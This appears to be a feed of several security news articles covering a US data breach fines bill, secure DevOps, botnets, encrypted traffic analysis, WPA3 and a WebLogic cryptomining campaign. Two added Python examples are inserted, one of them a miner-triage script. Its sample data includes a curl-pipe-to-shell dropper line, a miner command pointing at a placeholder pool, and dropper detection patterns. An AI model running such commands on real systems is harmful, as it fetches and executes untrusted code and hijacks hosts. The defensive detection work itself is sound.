STE WILLIAMS

Leaky credit report biz face massive fines if US senators get their way

New legislation introduced in the US Senate by Elizabeth Warren (D-MA) and Mark Warner (D-VA) would result in credit reporting agencies being slapped with stiff fines if they play fast and loose with data security.

The Data Breach Prevention and Compensation Act [PDF] would impose a mandatory $100 fine per person affected on credit agencies that leak customer records each with at least one piece of personal identifying information (PII), and an additional $50 fine for every other piece of PII exposed.

The fines would be administered by the Federal Trade Commission, and the legislation requires that at least half of any fines collected would be funneled back to citizens whose data had been lifted by hackers. The bill would also set up a director and office of cybersecurity that would perform regular checks on the IT security of credit agencies and could fine businesses up to 75 per cent of their annual gross revenues for egregious computer defense failings.


“In today’s information economy, data is an enormous asset. But if companies like Equifax can’t properly safeguard the enormous amounts of highly sensitive data they are collecting and centralizing, then they shouldn’t be collecting it in the first place,” said Senator Warner.

“This bill will ensure that companies like Equifax – which gather vast amounts of information on American consumers, often without their knowledge – are taking appropriate steps to secure data that’s central to Americans’ identity management and access to credit.”

Despite widespread outrage over the scale of the Equifax hack that was revealed in September – which exposed the private data of over 143 million Americans, more than 15 million Brits, and goodness knows who else – the firm has faced no fines or fallout, other than some tax-deductible clean-up charges.

Equifax is not alone in having shoddy practices. The National Credit Federation, a US credit repair biz, left 111GB of customer data on an open Amazon S3 bucket for thieves to find, although fortunately security researchers got there first and shut down that hole.

If this legislation had been enacted before the Equifax breach was revealed, the agency would potentially be facing a bill of at least $1.5bn, and possibly a lot more. Under the proposed rules, however, fines for data breaches would be capped at 50 per cent of a firm’s gross annual revenue.

“The financial incentives here are all out of whack – Equifax allowed personal data on more than half the adults in the country to get stolen, and its legal liability is so limited that it may end up making money off the breach,” said Senator Warren.

“Our bill imposes massive and mandatory penalties for data breaches at companies like Equifax – and provides robust compensation for affected consumers – which will put money back into peoples’ pockets and help stop these kinds of breaches from happening again.”

The draft law has to clear the Senate and House of Reps before it gets anywhere near President Trump’s pen. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/credit_reporting_agencies_fines/

‘Shift Left’: Codifying Intuition into Secure DevOps

Shifting left is more than a catchy phrase. It’s a mindset that emphasizes the need to think about security in all phases of the software development life cycle.

Continuous delivery (CD) is becoming the cornerstone of modern software development, enabling organizations to ship — in small increments — new features and functionality to customers faster to meet market demands. CD is achieved by applying DevOps practices and principles (continuous integration and continuous deployment) from development to operations. There is no continuous delivery without implementing DevOps practices and principles. By that, I mean strong communication and collaboration across teams, and automation across testing, build, and deployment pipelines. But often achieving continuous delivery to meet market demands presents numerous challenges for security. 

While DevOps principles and practices acknowledge the need for security, many organizations struggle to find the right fit and speed for integrating security into DevOps. In a study conducted by HP Enterprise, 99% of respondents say that while DevOps culture offers the opportunity to improve application security practices, only 20% of respondents say that secure systems development life cycle (SDLC) testing is done throughout their development process. (Read “Software Assurance: Thinking Back, Looking Forward.”)

Security is still trying to catch up with all the innovative software being developed, tested, deployed, and delivered without slowing or bogging down the process. Security has to be intrinsic and transparent yet visible enough in the process that it is a “shared” responsibility at the heart of DevOps practices and principles. So when a product owner describes new features and functionality that need to be added to the next release, everyone thinks about ways in which those features and functionality can be designed and implemented securely to reduce exposures and vulnerabilities. This is what it means to “Shift Left.”

I often hear that slogan in the industry: “Shift Left.” Most of the time the term is used in reference to moving security testing into continuous integration. While I agree that security testing as part of continuous integration is important, it’s way too late at that point in time. “Shift Left” must go far left, past continuous integration into the requirements and design phases. “Shift Left” to me is a mindset that thinks about security from the onset and is pervasive throughout the software development process. This is what it means to build “security in.”

When you start far left, you have the opportunity to embed the appropriate security lexicon and security considerations into the requirements phase. Starting with really solid security requirements allows organizations to codify their intuitions into design; it enables organizations to make sound design decisions up front that will help eliminate technical debt and reduce the cost to maintain software.

Codifying intuitions is a concept I got from a colleague of mine, David Molnar, a security researcher from Microsoft, in a talk about what security can learn from AI. The concept of “codifying your intuitions” was used in a larger context for the security domain, but also, specifically, for defending against adversarial activity and advanced persistent threats in a talk by security researcher Taesoo Kim. I like the concept because it reinforces the need to think like an adversary and to build some of our intuitions and assumptions not only into security design but also into developers’ daily activities. Kim gives an example in his talk about what led Jung Hoon Lee, a notable bug bounty hunter, to find vulnerabilities at the Pwn2Own 2016 hacking contest. Lee attributes the discovery of exploitable vulnerabilities to his “intuition.”

The Gift of Intuition
Experience in the trenches working in security, developing software, breaking software, and protecting software forms patterns in our minds that provide a solid foundation from which we can train our minds and mental capacities to recognize those patterns and be more aware. I tend to look at intuition as the revelations about the mental patterns we accumulate over time; intuition forms from the right hemisphere of the brain (the creativity region) and inspires ingenuity. As with many complex problems in cybersecurity, solutions to those problems often require some level of curiosity and creativity to decompose complexity. This same level of curiosity and creativity is what often motivates attackers. It must be applied to software development to help organizations shift their “security-minded thinking” all the way left.

One of the keys to shifting left is figuring out how to codify intuitions into threat models that can be used to guide secure software development. This could be in the form of user stories and misuse/abuse cases that help organizations better understand how to securely design and implement features and functionality into software. These threat models can be used to:

  • Guide product teams in making good design decisions regarding security features of the systems.
  • Assist developers in understanding the consequences of their refactoring or development activities when implementing the design in code.
  • Develop situational awareness about security threats and risks that can be used to guide more targeted and efficient security testing (achieving security “at-speed”) throughout the software development life cycle.

To help organizations formalize threat modeling activities into their SDLC, organizations should consider adopting the following practices and standards:

  • Leverage Common Architectural Weakness Enumeration (CAWE) in formulating good user stories about new features and functionality. CAWE was recently added to MITRE’s CWE 3.0 release.
  • For user stories, crosswalk CAPEC and ATT&CK to codify intuitions in the development of misuse/abuse cases to better understand the ways in which the system can be compromised and attacked.
  • Once the security design has been validated and verified, use CWE to understand how to correctly implement the security design, along with the features and functionality, in code.

Shifting left is a mindset, a philosophy that emphasizes the need to think about security (codify your intuitions) in all phases of the SDLC.


Kevin Greene is a thought leader in the area of software security assurance. He currently serves on the advisory board for New Jersey Institute of Technology (NJIT) Cybersecurity Research Center, and Bowie State University’s Computer Science department. Kevin has been very …

Article source: https://www.darkreading.com/vulnerabilities---threats/shift-left-codifying-intuition-into-secure-devops/a/d-id/1330786?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

FBI Director: Cryptocurrency, Nation-State Attacks, Among Agency’s Top Cybersecurity Concerns

Speaking at the International Conference on Cyber Security, FBI director Christopher Wray pointed to a rise in nation-state attacks – and to strong encryption that limits bureau investigations.

FBI Director Christopher Wray outlined a list of growing cybersecurity concerns his agency faces during a speech this week at the International Conference on Cyber Security in New York.

A rise in nation-state sponsored computer intrusion attacks, the growing frequency of “blended threats” in which nation-states hire cybercriminals to do the work, advances in artificial intelligence, and the emergence of cryptocurrency are all contributing to the agency’s concerns and challenges, Wray says.

He also cited an increase in the number of cases where the FBI was unable to access electronic evidence. Last fiscal year, such cases involved 7,775 devices. “The FBI supports information security measures, including strong encryption. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep this country safe,” he said.

Wray also highlighted improvements made to the agency’s cybersecurity operations. The FBI now assigns work based on an agent’s cybersecurity experience rather than jurisdiction; Cyber Action Teams have been formed for quick deployment; every field office has a Cyber Task Force; and indictments and US Treasury Department sanctions will be sought even if a defendant can’t be apprehended.

Read more about Wray’s comments here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/attacks-breaches/fbi-director-cryptocurrency-nation-state-attacks-among-agencys-top-cybersecurity-concerns/d/d-id/1330795?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

AWS, Google Cloud Popular Home for Botnet Controllers

The number of command-and-control listings increased 32% in 2017, with more botnet controllers hosted in the cloud.

Botnet controllers increased by 32% in 2017, and more cybercriminals are taking advantage of legitimate cloud providers like Amazon and Google to host them, researchers report.

The team at Spamhaus Malware Labs this week published its 2017 Botnet Threat Report, which digs into the numbers and trends behind botnet threats encountered throughout the year. In 2017, the company identified and issued Spamhaus Block List (SBL) listings for more than 9,500 botnet command-and-control (C&C) servers on 1,122 different networks. The SBL is a database of IP addresses from which the organization does not recommend accepting mail.

As a means to control malware-infected machines and exfiltrate data, C&C servers play a critical role in operations to distribute spam, ransomware, and banking Trojans, launch DDoS attacks, and mine cryptocurrencies like Bitcoin. Nearly every seventh SBL listing was for a botnet controller.

Most (68%) of the controllers discovered in 2017 were hosted on servers ordered by attackers for the sole purpose of hosting botnet controllers. These servers are put on Spamhaus’ Botnet Controller List, which helps networks avoid traffic to/from botnets — because none of these IP addresses host legitimate services, they can be directly blocked on corporate networks without affecting real traffic. Spamhaus blacklisted an average of 600-700 servers per month in 2017.

Lawrence Orans, research vice president at Gartner with a focus on network security, says when it comes to botnets, most businesses are concerned about DDoS attacks.

“A shift in botnet activity came in the end of 2016, in September and October, with the emergence of the Mirai botnet and how that was used in a high-profile DDoS attack,” he explains. DDoSes remain the biggest botnet-related threat corporations face, and they should have mitigation capabilities in place from a service provider or content delivery network.

According to Spamhaus research, a standout trend from 2017 is the marked increase in botnet controllers hosted on legitimate cloud services. Most are on Amazon Web Services: Amazon alone hosted 303 C&C servers in 2017 compared with 36 in 2016. However, analysis from earlier this year found Google’s cloud platform, Compute Engine, is also hosting more botnets.

Orans says this isn’t necessarily a “game-changing shift,” given that many modern security tools are designed to detect callbacks to C&C servers. Detection wouldn’t be affected regardless of server location, he says.

Spamhaus notes that some cloud providers have begun to deal with the problem of fake sign-ups, but others still struggle with the issue. Major cloud providers were “overwhelmed” by the large number of fraudulent sign-ups on their networks in 2017, researchers explain.

Fraudulent sign-ups are one part of the growing botnet problem. Compromised servers and websites are another. It’s tough for ISPs or hosting providers to prevent compromise because servers and websites are mostly under customer control and many run outdated software. Cybercriminals can easily scan the Internet for these; open-source content management systems like WordPress, Drupal, Joomla, and Typo3 are all popular targets, Spamhaus reports.

Most of the malware associated with botnet controllers detected in 2017 consisted of banking Trojans, particularly Chthonic, Gozi, Heodo, TrickBot, Dridex, Worm.Ramnit, AZORult, and PandaZeuS. Droppers/credential stealers were also common: Downloader.Pony, Loki, Smoke Loader, and Neutrino. Criminals also often distributed IoT malware, ransomware, and backdoors.

Spamhaus anticipates the growth of IoT threats will likely continue in 2018, and Orans agrees.

“For example, many home appliances lag in security protection, so they can be easily compromised by malware and become part of a botnet,” he says. “This is what we saw with the Mirai botnet in 2016.”

Further, Orans emphasizes the importance of knowing how to respond if your business is targeted with a DDoS attack. “Who’s going to interface with the public? Who’s going to interface with executives? You should have a playbook in place for a botnet-generated DDoS attack,” he says.

The person who interfaces with the board, and the public, following an attack will depend on the company’s size. Generally the person who speaks with the public will not be the security leader, Orans explains, but a communications professional or public relations representative.


Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University.

Article source: https://www.darkreading.com/cloud/aws-google-cloud-popular-home-for-botnet-controllers/d/d-id/1330798?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Cisco Adds Encrypted Traffic Analysis Function

New Encrypted Traffic Analytics is designed to help enterprises inspect encrypted traffic for malicious activity without having to decrypt it first.

After months of field trials, Cisco has now moved its Encrypted Traffic Analytics (ETA) technology to general availability. ETA addresses the increasingly critical security challenge of inspecting encrypted traffic for malicious activity – without first having to decrypt it.

In addition to its campus switches, ETA will also now be available with a majority of Cisco’s enterprise routing platforms including its branch office router, Integrated Services Router, and Cloud Services Routers, the company announced Jan 10.

Attackers have increasingly begun using encryption to hide payloads, command and control communications, data exfiltration, and other activity from conventional malware detection tools. Typically, the only way to inspect this traffic is to decrypt it first, which, besides being technologically challenging, can compromise the privacy of the encrypted traffic — a problem especially for organizations that are required to comply with certain data regulations. US-CERT has even cautioned organizations about the dangers of implementing interception tools that weaken TLS security.

“The network is growing more and more opaque through encrypted transports,” says Cisco principal engineer TK Keanini. “When threat actors use encrypted transports their activities are hidden and we cannot afford for any malicious activity to be hidden, as this is the primary way they will persist in your network.”

A study conducted by Zscaler showed malicious threats using SSL encryption doubling in the first six months of last year. The security vendor reported blocking an average of 12,000 phishing attempts delivered over SSL/TLS every day — a 400% increase over the previous year.

Many of the new malware strains that the company blocked last year used SSL to encrypt C&C communications. Banking Trojans such as Dridex and Trickbot accounted for 60% of these payloads, and ransomware accounted for 25% of the payloads using SSL/TLS encryption for C&C activity.

“Seventy percent of the traffic that we are seeing in the Zscaler cloud is encrypted,” says Deepen Desai, Zscaler’s director of research and operations. “And 54% of the advanced threats Zscaler blocks are hidden inside SSL traffic, making clear that inspecting SSL traffic is no longer optional.”

Cisco’s ETA is designed to give organizations a way to detect and block such threats. ETA’s principal benefit, according to Cisco, is that it does not rely solely on decryption to inspect traffic.

Instead, the technique uses a combination of network telemetry and machine learning to look for differences between malicious and benign traffic in three specific features of encrypted data.

The first is the initial data packet of the connection, which often contains important data about the rest of the encrypted content. The second is the sequence of packet lengths and times, which gives clues about the traffic content beyond what is available in the initial packet. The third feature that ETA checks is the byte distribution across the packet payloads within the encrypted traffic flow, according to the company. ETA’s ability to spot the telltale signs of malware in encrypted traffic is based on research the company conducted into the differences in how malicious and benign traffic uses TLS, DNS, and HTTP.
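As an added illustration of those three feature families (this is not Cisco’s ETA code; the two flows, the thresholds, and the positive-outbound/negative-inbound length convention are assumptions made for the example), the following Python extracts the initial-packet, length/time-sequence, and byte-distribution features from constructed TLS flows and flags a fixed-cadence check-in pattern without ever decrypting anything:

```python
"""Feature extraction from encrypted flows without decryption.

Added example of the three feature families described above: the
initial data packet, the sequence of packet lengths and times, and
the byte distribution of the payloads. Not Cisco's implementation;
the two flows below are constructed, not captured traffic.
"""
from __future__ import annotations

import math
import random
from collections import Counter
from dataclasses import dataclass
from statistics import mean, pstdev


@dataclass(frozen=True)
class Packet:
    ts: float        # seconds since the first packet of the flow
    outbound: bool   # True = client to server
    payload: bytes   # raw TLS record bytes; the contents stay opaque


def initial_packet_features(flow: list[Packet]) -> dict:
    """Feature 1: what the first data packet reveals from its record header alone."""
    first = flow[0].payload
    is_handshake = len(first) >= 5 and first[0] == 0x16 and first[1] == 0x03
    return {
        "first_len": len(first),
        "tls_handshake": is_handshake,
        "record_version": first[1:3].hex() if len(first) >= 3 else "",
    }


def splt_features(flow: list[Packet], n: int = 10) -> dict:
    """Feature 2: sequence of packet lengths and inter-arrival times.

    Outbound lengths stay positive and inbound ones become negative so that
    direction survives in the sequence (a convention assumed for this example).
    The coefficients of variation summarise how regular the flow is.
    """
    seq, prev_ts = [], flow[0].ts
    for p in flow[:n]:
        signed_len = len(p.payload) if p.outbound else -len(p.payload)
        seq.append((signed_len, round(p.ts - prev_ts, 3)))
        prev_ts = p.ts
    gaps = [gap for _, gap in seq[1:]]
    lens = [abs(length) for length, _ in seq]

    def cv(values: list[float]) -> float:
        return pstdev(values) / mean(values) if len(values) > 1 and mean(values) > 0 else 0.0

    return {"splt": seq, "gap_cv": round(cv(gaps), 3), "len_cv": round(cv(lens), 3)}


def byte_distribution(flow: list[Packet]) -> dict:
    """Feature 3: byte histogram over all payloads, summarised as entropy."""
    counts = Counter()
    for p in flow:
        counts.update(p.payload)
    total = sum(counts.values())
    entropy = -sum(c / total * math.log2(c / total) for c in counts.values()) if total else 0.0
    return {"entropy": round(entropy, 3), "distinct_bytes": len(counts)}


def flow_features(flow: list[Packet]) -> dict:
    """Combine the three feature families and flag a beacon-like cadence.

    The thresholds are illustrative; a real detector would learn them from
    labelled benign and malicious flows rather than hard-code them.
    """
    feats = {**initial_packet_features(flow), **splt_features(flow), **byte_distribution(flow)}
    feats["beacon_like"] = len(flow) >= 5 and feats["gap_cv"] < 0.05 and feats["len_cv"] < 0.05
    return feats


# --- constructed sample flows -------------------------------------------------

def _tls_record(rng: random.Random, content_type: int, body_len: int) -> bytes:
    """A 5-byte TLS record header followed by random bytes standing in for ciphertext."""
    header = bytes([content_type, 0x03, 0x01]) + body_len.to_bytes(2, "big")
    return header + bytes(rng.getrandbits(8) for _ in range(body_len))


def make_benign_flow() -> list[Packet]:
    """Constructed HTTPS-like session: a handshake, then bursty, mixed-size records."""
    rng = random.Random(7)
    spec = [  # (timestamp, outbound, content type, body length)
        (0.000, True, 0x16, 512), (0.045, False, 0x16, 1395),
        (0.046, False, 0x16, 1195), (0.090, True, 0x16, 88),
        (0.135, False, 0x16, 46), (0.200, True, 0x17, 295),
        (0.250, False, 0x17, 1395), (0.252, False, 0x17, 895),
    ]
    return [Packet(ts, out, _tls_record(rng, ct, n)) for ts, out, ct, n in spec]


def make_beacon_flow() -> list[Packet]:
    """Constructed check-in pattern: one same-size record every 30 s, nothing else."""
    rng = random.Random(11)
    flow = [Packet(0.0, True, _tls_record(rng, 0x16, 83))]
    for i in range(1, 10):
        flow.append(Packet(30.0 * i, True, _tls_record(rng, 0x17, 83)))
    return flow


if __name__ == "__main__":
    for name, flow in (("benign", make_benign_flow()), ("beacon", make_beacon_flow())):
        f = flow_features(flow)
        print(f"{name}: first_len={f['first_len']} gap_cv={f['gap_cv']} "
              f"len_cv={f['len_cv']} entropy={f['entropy']} beacon_like={f['beacon_like']}")
```

Both flows carry high-entropy payloads, so the byte distribution alone separates nothing here; it is the length/time sequence that exposes the fixed cadence, which is why the three feature families are used together.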

“Encrypted Traffic Analytics not only finds malicious activities without decryption but it also helps organizations answer a critical question on a daily basis: How much of my digital business travels in the clear versus encrypted?” Keanini says. The Cisco network itself is able to deliver the needed telemetry for security, thereby lowering administrative and operational costs, he says.

The essence of ETA is its ability to infer things from encrypted traffic, by passively monitoring it, rather than opening up and inspecting the contents. “Decryption is not a real option for many reasons,” Keanini says. “We need to respect encryption and privacy while finding other methods to detect through inference not direct inspection.”

According to Keanini, enterprises that have been testing ETA have reported gaining additional insight into what is encrypted on their network and the quality of that encryption as well.

The broader support for ETA announced this week means that enterprises can now get visibility into more of the encrypted traffic flowing across their networks. “All of these infrastructure software upgrades get you to a point where there is new telemetry being analyzed by Cisco Stealthwatch without the need for decryption,” Keanini says.


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/vulnerabilities---threats/cisco-adds-encrypted-traffic-analysis-function/d/d-id/1330799?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Marketing ads, soon to be screening on your car dashboard

Drivers of the world, you need a pizza.

You might not know that you need a pizza, but your internet-connected car may soon assume that you do, in fact, need a pizza. Yes, you could soon be seeing on-dashboard ads and coupons for your nearest pizza shop (unless you fork over money for an ad-free driving experience, that is).

Welcome to the future: get ready for car-delivered ads tailored to your whereabouts and your typical routes. Auto-tech firm Telenav announced on Thursday an “in-car advertising platform” for internet-connected cars.

What’s that, you say? You just want to tool around in your Lexus without seeing ads for Little Caesar’s Pizza? Petco kitty litter? IHOP pancakes?

Well, sure, ad-free driving is still an option, no worries. You’ll just have to pay more for connected-car services if you opt out of getting marketed at. Silicon Beat quoted a Telenav spokeswoman:

In return for accepting ads in vehicles, drivers benefit from access to connected services without subscription fees, as well as new driving experiences that come from the highly-targeted and relevant offers delivered based on information coming from the vehicle.

Telenav CEO H.P. Jin said in the company’s press release that it’s an “exciting” new opportunity for OEMs to “monetize connectivity to cover service costs” and to drive “healthy profits” while delivering “safely delivered, engaging and relevant offers.”

Safely delivered, as in, you won’t see the ads while the car is moving. That opens the possibility of perfecting the art of slowly rolling through stop signs if you don’t want the ads to catch up to you. Not that we recommend that scofflaw behavior, mind you.

Besides, who knows? The ads might come in handy.

On Telenav’s page for its “Thinknear” mobile-advertising products, it boasts of its access to data, showing where people are and what they do in the marketplace.

We’re talking about taking all the good stuff (the consumer behavior stuff, the location services stuff, the data crunching stuff) and mixing it all together so you have the power to give consumers ads they actually want. Even before they know they want it.

See? Pizza. You didn’t know you wanted it, but Telenav saw you were just about to pass a pizza joint, so there you have it. On the truly practical, more low-carb side, as Telenav points out, your car’s knowledge of where you are can come in handy when mixed with its knowledge that you’re about to run out of gas.

From its press release on what it’s dubbed the In-Car Advertising Platform software development kit (SDK):

Relevant ads such as coupons and recommendations are delivered to customers based on information from the vehicle, including frequently traveled routes, destinations, and time of the day. As an example, drivers can be encouraged to pick up a discounted pizza on the way home or be alerted to sales at stores near their destination. In addition, when the vehicle is low on gas, the platform points out nearby stations along the driver’s route, potentially with discount offers.

Telenav says that in order to ensure salivating drivers don’t wrap themselves around telephone poles, distracted as they might be by all this talk of pizza, ads will only appear when the vehicle is stopped, be it at car startup, traffic lights and upon arrival. Whenever the car is in motion, or whenever drivers interact with other in-dash functions such as music or phone calls, poof, the ads disappear.

A Telenav spokesperson told Silicon Beat that most of the ads would be static, with some animated ads thrown in, but they won’t contain audio.

The company wants to sell the SDK to major auto manufacturers. The Telenav spokeswoman told Silicon Beat that Toyota, Lexus, Ford, GM and Cadillac already use the company’s connected-car products.

Will you be able to get away from ads in autonomous cars, where the whole “let’s not distract the driver” thing goes right out the window? That’s highly unlikely, given that we’re talking about a captive audience that can be safely distracted.

Will you pony up the money to drive a car without ads? Or does the idea of getting a coupon for a nearby store inspire you to scream “EXTRA CHEESE, PLEASE!!!”???


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/D0A-_s7UKH4/

Wi-Fi security overhaul coming with WPA3

Nearly 14 years after it ratified WPA2 (Wi-Fi Protected Access 2), the Wi-Fi Alliance has given the world a peek at what might be coming next for wireless security.

Perhaps unsurprisingly called WPA3, the draft standard’s announcement at the annual CES Show was brief, but offered clues as to how it might address WPA2’s known problems.

The main message is that under WPA3, security will be baked deeper into wireless configuration, making it harder to misconfigure or to avoid.

Four enhancements are mentioned:

  • Brute-force resistance. There will be protection against brute-force attacks on Wi-Fi passwords. In future, authentication will be blocked after several unsuccessful attempts. This should, in theory, help to limit the exposure caused by weak passwords.
  • IoT support. Wi-Fi devices will be easier to configure using smartphones, a nod to the massive growth in Internet of Things (IoT) hardware using Wi-Fi that could cause major problems if not set up correctly.
  • Stronger encryption. Government and business networks will gain access to “a 192-bit security suite, aligned with the Commercial National Security Algorithm (CNSA) Suite from the Committee on National Security Systems.” This implements technical encryption changes required by the US Government.
  • Safer public Wi-Fi. The announcement mentions “strengthen[ing] user privacy in open networks through individualized data encryption,” although it’s not absolutely clear what this refers to.

Speculating, the last enhancement could be a tightening up of the perennial problem of public Wi-Fi networks (e.g. airports, coffee shops, public transport) that are free to use without a password. WPA3 might provide an automatic system for allowing clients and routers to negotiate encrypted connections even on open networks.

If so, this system could also be used to address a cryptographic weakness of password-protected Wi-Fi networks. At the moment, anyone who knows the Wi-Fi PSK (Pre-Shared Key, commonly called the “network password”) and who intercepts your traffic at the moment you connect can recover your session key and decrypt all your subsequent traffic.

A password to get on the network combined with an unsniffable unique password for each user would be a useful security improvement.

Presumably, WPA3 will also avoid the sort of implementation flaws in WPA2 that led to the KRACK attack of October 2017.

That flaw was addressed with updates to WPA2 equipment, without any new hardware, so it’s possible that some of what’s in WPA3 might also be addressable with incremental updates to WPA2, even in devices that can’t support WPA3 outright.

The point of a “WPA3 Certified” sticker on products would be to make it easier for buyers to understand what security they were gaining from new equipment – a sort of easy-to-understand line in the sand.

But it’s one thing to promote a new specification, another to persuade organisations and individuals to buy new equipment to support it.

This could unfold over years, which means that WPA2 security will be with us for a long time.

We might have to get used to the reality of a world of two-level wireless security – strong WPA3 and (as research undermines it) weakening WPA2.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/04KPzChVTuM/

Oracle WebLogic Exploit Used in Cryptocurrency Mining Campaign

PeopleSoft and WebLogic app servers, as well as cloud systems using WebLogic, hacked and used to net some $226K in digital currency.

Enterprises that failed to install Oracle’s critical WebLogic patch last October could find their PeopleSoft and cloud-based servers churning out cryptocurrency, a new discovery shows.

A security researcher found attackers had mined 611 Monero coins, which carry a current value of $226,070, by exploiting the WebLogic flaw in vulnerable servers around the globe. Reports began to emerge earlier this week that a malicious campaign was underway to deploy Monero cryptocurrency miners on these unpatched systems, according to a blog post by Renato Marinho, chief research officer at Morphus Labs, who made the discovery.

The attackers were using a proof-of-concept exploit released in late December by Chinese researcher Lian Zhang that uses a critical vulnerability in the WebLogic app server; Oracle issued a patch for the flaw in October, says Johannes Ullrich, dean of research for SANS Technology Institute.

The exploit’s use for crypto mining was discovered in the past few weeks because it crashed several WebLogic servers, Ullrich explains. Crypto mining relies on large amounts of processing power from computers, servers, and even mobile devices to mine cryptocurrency. As a result, computing systems can slow down and crash when crypto miners are deployed on them.

In this recent case, the attackers were using the exploit solely to launch crypto miners on PeopleSoft and WebLogic app servers as well as Oracle and Amazon cloud environments that were tied to WebLogic app servers, Ullrich says. The attackers did not use the exploit to steal or alter valuable data and information contained in the PeopleSoft app servers.

PeopleSoft applications are widely used by enterprises, which rely on them to handle sales force management, human resources, financial planning, and other tasks.

“The attackers had access to all the information in PeopleSoft that is touching WebLogic servers, but rather than sell this information on the black market, which takes more work than writing a simple script to exploit the system and drop crypto mining software on it, they probably thought they could get more money by crypto mining,” Ullrich says.

Bitcoin, for example, has soared from $5,000 three months ago to close at $14,000 per coin on Tuesday.

If there is a crypto miner on a server, it means the bad guys found a way to exploit the system and may have further compromised it, Ullrich warns. As a result, companies need to dig deeper if they find a crypto miner on their system and not assume that’s the full extent of the attack.
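As an added example (not code from the article, Morphus Labs or SANS), the following Python triages a constructed process listing and connection table from a WebLogic host: it flags miner indicators and, because a miner proves the attacker already had code execution as the application account, it returns the follow-up checks a responder should complete before declaring the incident closed. The process names, pool address, ports and IP addresses are made up, and the indicator patterns are generic heuristics, not the campaign’s indicators of compromise.

```python
"""Added example: triage a host for cryptominer indicators.

Not code from the article, Morphus Labs or SANS. Process names, paths,
pool host, ports and addresses are constructed for this example, and the
indicator patterns are generic heuristics, not the campaign's IOCs.
"""
import re
from dataclasses import dataclass

# Generic miner indicators: Stratum protocol URL, well-known miner CLI
# switches or binary names, and ports commonly used by mining pools.
MINER_ARGS = re.compile(r"stratum\+tcp://|--donate-level|--algo[= ]|\bxmrig\b|\bminerd\b", re.I)
STRATUM_PORTS = {3333, 4444, 5555, 7777, 14444}
# Binaries started from world-writable or hidden directories.
SUSPICIOUS_PATH = re.compile(r"^(/tmp|/var/tmp|/dev/shm)/|/\.[^/]+/")
# Download-and-execute one-liners that typically fetch the miner.
DROPPER = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.I)


@dataclass
class Proc:
    pid: int
    user: str
    cpu: float
    cmd: str


def parse_ps(text):
    """Parse a constructed 'PID USER %CPU COMMAND' listing (header skipped)."""
    procs = []
    for line in text.strip().splitlines()[1:]:
        pid, user, cpu, cmd = line.split(None, 3)
        procs.append(Proc(int(pid), user, float(cpu), cmd))
    return procs


def parse_connections(text):
    """Map PID -> remote ports from netstat-style 'tcp ... ADDR:PORT STATE PID/NAME' lines."""
    ports_by_pid = {}
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) < 7 or parts[0] != "tcp":
            continue
        remote_port = int(parts[4].rsplit(":", 1)[1])
        pid = int(parts[6].split("/")[0])
        ports_by_pid.setdefault(pid, set()).add(remote_port)
    return ports_by_pid


def triage(ps_text, net_text):
    """Return per-process findings plus the follow-up work a miner implies."""
    conns = parse_connections(net_text)
    findings = []
    for p in parse_ps(ps_text):
        reasons = []
        if MINER_ARGS.search(p.cmd):
            reasons.append("miner command line")
        if STRATUM_PORTS & conns.get(p.pid, set()):
            reasons.append("connection to a common Stratum port")
        if p.cpu >= 90 and SUSPICIOUS_PATH.search(p.cmd.split()[0]):
            reasons.append("high CPU from temp/hidden path")
        if DROPPER.search(p.cmd):
            reasons.append("download-and-execute dropper")
        if reasons:
            findings.append((p.pid, p.user, reasons))
    miner_found = any(r in ("miner command line", "connection to a common Stratum port")
                      for _, _, rs in findings for r in rs)
    # A miner is evidence of code execution as the app server account, so the
    # review cannot stop at killing the process (the article's "dig deeper").
    next_steps = [] if not miner_found else [
        "preserve memory, /tmp, cron entries and app server logs before any cleanup",
        "find the request that delivered the dropper in the app server access logs",
        "treat every record the compromised account could read as potentially accessed",
        "apply the vendor patch or a virtual patch before returning the server to service",
    ]
    return {"findings": findings, "miner_found": miner_found, "next_steps": next_steps}


# Constructed sample input (hostnames, addresses and process names are made up).
SAMPLE_PS = """\
PID USER %CPU COMMAND
1201 oracle 2.3 /u01/jdk/bin/java -Dweblogic.Name=AdminServer weblogic.Server
4410 oracle 98.7 /tmp/.x/kworkerds -o stratum+tcp://pool.example.net:3333 -u 44abc -p x --donate-level=1
4412 oracle 0.1 /bin/sh -c curl -s http://198.51.100.7/s.sh | sh
2210 root 0.4 /usr/sbin/sshd -D
"""
SAMPLE_NET = """\
tcp 0 0 10.0.0.5:7001 10.0.0.9:51822 ESTABLISHED 1201/java
tcp 0 0 10.0.0.5:51234 203.0.113.7:3333 ESTABLISHED 4410/kworkerds
"""

if __name__ == "__main__":
    result = triage(SAMPLE_PS, SAMPLE_NET)
    for pid, user, reasons in result["findings"]:
        print(f"pid {pid} ({user}): {', '.join(reasons)}")
    for step in result["next_steps"]:
        print("next:", step)
```

The point of the `next_steps` list is Ullrich’s warning: the miner ran as the same account that serves PeopleSoft data, so the same foothold could have been used to read or alter that data, and the server should be treated as compromised rather than merely cleaned.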

Rick McElroy, security specialist at Carbon Black, expects crypto mining attacks to increase this year as nation states, such as North Korea, get involved in cryptocurrency. “Mining will be a more prevalent problem because it now has become part of their economy, so you can expect more of these attacks abroad,” he says.

Deploying Oracle Patches

Enterprises tend to be slow in deploying Oracle updates, fearing it will break their mission-critical systems. “The Oracle and PeopleSoft ecosystems are very complex, and on top of that companies customize a lot of their code,” Ullrich says, estimating 10% to 20% of companies do not update when Oracle issues a patch.

